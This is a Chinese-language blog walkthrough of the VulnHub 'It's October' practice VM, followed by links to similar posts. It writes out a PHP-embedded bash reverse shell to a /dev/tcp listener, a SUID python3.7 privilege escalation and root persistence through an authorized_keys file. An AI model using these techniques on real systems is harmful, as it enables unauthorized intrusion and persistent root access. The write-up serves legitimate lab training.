vulnhub靶机渗透 | It's October
这个靶机也算是比较基础的了,整体考察个人基础能力。 上说话,多动手。 博主的文章编辑能力实在太差,就不弄那些标题第几步什么啥的了,直接渗透它。
靶机下载地址:https://download.vulnhub.com/itsoctober/Its_October.ova
开始:
提醒:如果发现和找不到IP,请翻下之前的文章有详解,这里就不细说了。
1.1 netdiscover、nmap来查找目标机IP以及其开放端口和服务(192.168.248.158)
1.2 登录80端口看一下,并未发现可直接利用的点或信息
1.3 还有一个8080端口,看一下。在网页源代码中发现可用信息,是一个txt。
1.3.1 打开后发现是一个用户名和密码的信息,先记下来一定有用。
1.4 既然是有用户名密码,那么看一下有没有后台登录点吧!爆破一下目录
1.4.1 发现此目录,打开后发现了可后台登录的地方
1.4.2 尝试下刚才收集到的用户名密码,成功登录到后台!这里觉得这个靶机如此简单
admin adminadmin2
1.5 进入后台后寻找是否有可部署命令或代码或上传的执行的地方
1.5.1 在cms栏目中选择add,发现了可以进行代码执行的地方,我们可以创建一个函数用来反弹shell。
1.5.2 经过测试这里可以运行php脚本(必须放在php函数中)
有两个功能,测试了几次大概是如下功能:
markup:所打的代码会呈现在页面中,不做执行。
code:会执行,可以用作反弹。
采用以下触发命令函数:
function onstart(){exec("/bin/bash -c 'bash -i > /dev/tcp/192.168.248.154/1234 0>&1'");
}
1.5.3 同时设置监听
1.5.4 直接打开目标url或通过curl发送http请求触发php脚本:
curl -vv http://192.168.248.158/reverse
反弹成功!
1.6 目标为普通用户,接下来该进入到提权了
1.6.1 先查找一下suid
find / -perm -u=s -type f 2>/dev/null
1.6.2 发现python为3.7版本,所以去获取交互shell:
python3.7 -c 'import pty;pty.spawn("/bin/bash")'
1.6.3 让当前用户获得一个root 权限
python3.7 -c 'import os;os.execl("/bin/bash","bash","-p")'
1.6.4 尝试进入下root目录,发现已经可以进入
1.6.5 最后打开.txt,获取到传说中的flag
1.7 但拿到flag并不是最后一步。可以看到我们虽然有euid的root权限,但是其实除了拿flag并没啥卵用,所以接下来还是要变成root权限。
1.7.1 先给大家普及一下关于ssh-keygen的使用方法及配置authorized_keys两台linux机器相互认证的知识:
这个操作是为了让两个Linux机器之间使用ssh不需要用户名和密码直接登录上去。采用了数字签名RSA或者DSA来完成这个操作。 假设 A
(192.168.20.59)为客户机器,B(192.168.20.60)为目标机; 要达到的目的: A机器ssh登录B机器无需输入密码;
加密方式选 rsa|dsa均可以,默认dsa具体操作流程
单向登陆的操作过程:
1、登录A机器
2、ssh-keygen -t [rsa|dsa],将会生成密钥文件和私钥文件id_rsa,id_rsa.pub或id_dsa,id_dsa.pub
3、将 .pub 文件复制到B机器的 .ssh 目录, 并在B机器上 cat id_dsa.pub >> ~/.ssh/authorized_keys(或者直接mv id_dsa.pub root/.ssh/authorized_keys进行覆盖)
4、从A机器登录B机器的目标账户,不再需要密码了;(直接运行 ssh root@192.168.0.112 )注意:
设置authorized_keys权限 $ chmod 600 authorized_keys
设置.ssh目录权限 $chmod 700 -R .ssh
切记!!!一定要保证.ssh和authorized_keys都只有用户自己有写权限。否则验证无效。
1.7.2 按照如上方法进行操作:关于把.pub密钥发送到目标机上,可以用wget下载和scp或nc,,方法用很多按照自己想做的来。
1.7.3 登录无需密码:
ssh root@192.168.248.158
或:ssh root@192.168.248.158 -i /root/.ssh/id.dsa.pub
1.8 结语
比较关键的就是对于最后ssh登录这一步,折腾好久好久,一定要注意读写权限问题。关于此靶机其他的都比较基础,适用于新手食用。
vulnhub靶机渗透 | It's October相关推荐
- [网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可 ...
- [网络安全自学篇] 七十五.Vulnhub靶机渗透之bulldog信息收集和nc反弹shell(三)
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步.前文分享了APT攻击检测溯源与常见APT组织的攻击案例,并介绍防御措施.这篇文章将讲 ...
- Vulnhub靶机渗透学习——DC-9
本文仅个人学习所做笔记,仅供参考,有不足之处请指出! vulnhub靶机 vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试.提权. ...
- 【VulnHub靶机渗透】三:Billu_b0x
VulnHub是一个安全平台,内含众多渗透测试的靶场镜像,只需要下载至本地并在虚拟机上运行,即可得到一个完整的渗透测试练习系统,每一个靶机都有相关目标去完成(万分感谢提供靶机镜像的同学). 文章目录 ...
- 【VulnHub靶机渗透】一:BullDog2
在网上各位大佬WriteUp的帮助下,成功完成了第一次完整的靶机渗透测试(大佬NB!),现将详细过程及原理做简单整理. 文章目录 简介 渗透步骤 1.主机发现.端口扫描 2.Web扫描.漏洞发现 3. ...
- Vulnhub靶机渗透之 RAVEN: 1
目录 Description 网卡信息 信息收集 主机发现 主机存活扫描 端口扫描 网站信息 网站首页 nikto 报告 service 页面 wordpress 渗透过程 SSH 爆破 Hydr 命 ...
- Vulnhub靶机渗透之Me and My Girlfriend
本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记 前文链接 WAMP/DVWA/sqli-labs 搭建 burpsuite工具抓包及Intruder暴力破解的使用 目录扫描,请求重发,漏洞扫描 ...
- Vulnhub靶机渗透之 AI: Web: 1
靶机下载地址:AI:Web:1 Description: Difficulty: Intermediate Network: DHCP (Automatically assign) Network M ...
- vulnhub 靶机渗透:Stapler
Stapler nmap扫描 21 端口 22 53端口 80端口 目录爆破 139端口 666 端口 3306端口 12380端口 获取数据库root权限 获取系统立足点 提权 其他思路 系统立足点 ...
- Vulnhub靶机渗透测试——DC-3
一.实验环境 攻击机(kali): 192.168.189.148 靶机(ubuntu16.04): 192.168.189.182 靶机下载地址:https://www.vulnhub.com/en ...
最新文章
- 2018-2019-2 20165315《网络攻防技术》Exp6 信息搜集与漏洞扫描
- html中多边形图形怎么制作,CSS制作图形速查表
- js判断浏览器\屏幕分辨率(转载)
- 【CF1045A】A Last chance【贪心】【线段树优化建图】【网络流构造方案】
- 7-21-第三篇 validation相关操作
- L2-004 这是二叉搜索树吗?(二叉树)
- python运维开发实战
- ZZULIOJ 1047: 对数表
- Virtualbox Ubuntu增强功能
- XTU 设置教程 自动化 睡眠 休眠
- IRS2110S+IGBT半桥驱动调试问题记录
- a foreign key constraint fails ,外键表中添加数据时无法实现
- 死党教会我的编程”记忆大法“,安排!不看可别后悔
- linux系统中profile文件介绍
- C#:实现Euclidean distance欧氏距离算法(附完整源码)
- IntelliJ IDEA(社区版) 背景图片、颜色、字体等设置
- Spark数据分析之第5课
- kubernetes v1.20项目之二进制扩容多Master
- 11 万字的字节码编程系列合集放送(ASM、Javassist、Byte-buddy、Javaagent)
- c语言停车场的收费管理系统,c语言停车场管理系统